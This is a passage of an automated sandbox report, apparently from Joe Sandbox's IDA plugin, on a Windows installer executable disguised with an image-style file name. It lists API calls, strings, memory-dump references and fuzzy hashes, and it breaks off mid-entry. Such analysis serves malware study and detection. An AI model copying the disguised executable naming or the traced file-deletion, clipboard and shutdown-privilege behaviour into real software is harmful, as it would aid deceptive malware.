                                        • CharNextA.USER32(00000000), ref: 00405CCB
                                        • CharNextA.USER32(00000000), ref: 00405CDF
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsb535E.tmp, xrefs: 00405CB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsb535E.tmp
                                        • API String ID: 3213498283-3133259053
                                        • Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                        • Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
                                        • Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                        • Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                        • GetTickCount.KERNEL32 ref: 00402EFE
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                        • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                        • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00405374
                                        • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                          • Part of subcall function 00404379: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                        • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                                        • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                        • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                                        APIs
                                        • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
                                        • GlobalFree.KERNEL32(00650E50), ref: 00403A22
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3081826266
                                        • Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                        • Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
                                        • Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                        • Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9
                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-224404859
                                        • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                        • Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
                                        • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                        • Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E33116B
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E3311D8
                                        • GlobalFree.KERNEL32(?), ref: 6E331286
                                        • GlobalFree.KERNEL32(00000000), ref: 6E33129B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID:
                                        • API String ID: 3394109436-0
                                        • Opcode ID: 96804a68ab7b606e1cc766becd0dbf76ab957d25a63c1594b195ef5ec7f7f3bc
                                        • Instruction ID: 829e46c0e4dd5f540835adb108ed15d24122e0b0d6f6a005ffabd9c97bb7f8e1
                                        • Opcode Fuzzy Hash: 96804a68ab7b606e1cc766becd0dbf76ab957d25a63c1594b195ef5ec7f7f3bc
                                        • Instruction Fuzzy Hash: CE51C1B19046E6AFDB60CFA8C994EA6BBFCFB0A344F240495F585C7210D736D818CB91
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                        • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                        • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C
                                        APIs
                                        • SetErrorMode.KERNEL32(00008001), ref: 004033FB
                                        • GetVersionExA.KERNEL32(?), ref: 00403424
                                        • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                        • OleInitialize.OLE32(00000000), ref: 00403548
                                        • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                        • GetCommandLineA.KERNEL32(0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                        • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                        • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                        • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                        • lstrcatA.KERNEL32(00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                        • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                        • lstrcatA.KERNEL32(00436400,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                        • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000008,0000000A,0000000C), ref: 00403700
                                        • DeleteFileA.KERNEL32(00436000,?,00000008,0000000A,0000000C), ref: 00403714
                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                        • ExitProcess.KERNEL32 ref: 004037E0
                                        • lstrlenA.KERNEL32(00436400,00435000,00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                        • wsprintfA.USER32 ref: 00403846
                                        • GetFileAttributesA.KERNEL32(00431400,00436400,00431400,?,0000000C), ref: 00403878
                                        • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                        • SetCurrentDirectoryA.KERNEL32(00436400,00436400,00431400,?,0000000C), ref: 004038B0
                                        • CopyFileA.KERNEL32(00436C00,00431400,00000001), ref: 004038C6
                                        • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                        • ExitProcess.KERNEL32 ref: 004039B6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                        • String ID: "$A$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu%X.tmp
                                        • API String ID: 2956269667-914819399
                                        • Opcode ID: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                        • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                        • Opcode Fuzzy Hash: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                        • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E
                                        APIs
                                        • DeleteFileA.KERNEL32(?,?,74DF3410,00436400,00435000), ref: 00405A78
                                        • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,74DF3410,00436400,00435000), ref: 00405AC0
                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,74DF3410,00436400,00435000), ref: 00405AE1
                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,74DF3410,00436400,00435000), ref: 00405AE7
                                        • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,74DF3410,00436400,00435000), ref: 00405AF8
                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                        • FindClose.KERNEL32(00000000), ref: 00405BB6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2035342205-1173974218
                                        • Opcode ID: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                        • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                        • Opcode Fuzzy Hash: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                        • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                        • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                        • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                        • DeleteObject.GDI32(00000110), ref: 00404E33
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                        • ShowWindow.USER32(?,00000005), ref: 00404F94
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                        • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                        • GlobalFree.KERNEL32(?), ref: 00405172
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                        • ShowWindow.USER32(?,00000000), ref: 0040531C
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                        • ShowWindow.USER32(00000000), ref: 0040532E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                        • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                        • Opcode Fuzzy Hash: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                        • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                        • GetClientRect.USER32(?,?), ref: 004055BA
                                        • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                        • ShowWindow.USER32(?,00000008), ref: 0040565D
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                        • CloseHandle.KERNEL32(00000000), ref: 004056E4
                                        • ShowWindow.USER32(00000000), ref: 00405707
                                        • ShowWindow.USER32(?,00000008), ref: 0040570E
                                        • ShowWindow.USER32(00000008), ref: 00405754
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                        • CreatePopupMenu.USER32 ref: 00405799
                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                        • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                        • OpenClipboard.USER32(00000000), ref: 00405833
                                        • EmptyClipboard.USER32 ref: 00405839
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                        • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                        • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                        • CloseClipboard.USER32 ref: 0040588A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID:
                                        • API String ID: 590372296-0
                                        • Opcode ID: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                        • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                        • Opcode Fuzzy Hash: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                        • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                        • ShowWindow.USER32(?), ref: 00403E8F
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                        • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                        • DestroyWindow.USER32 ref: 00403ECE
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                        • GetDlgItem.USER32(?,?), ref: 00403F06
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                        • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                        • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                        • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                        • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                        • ShowWindow.USER32(00000000,?), ref: 00404108
                                        • EnableWindow.USER32(?,?), ref: 0040411A
                                        • EnableWindow.USER32(?,?), ref: 00404135
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                        • EnableMenuItem.USER32(00000000), ref: 00404152
                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                        • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                        • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                        • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                        Memory Dump Source
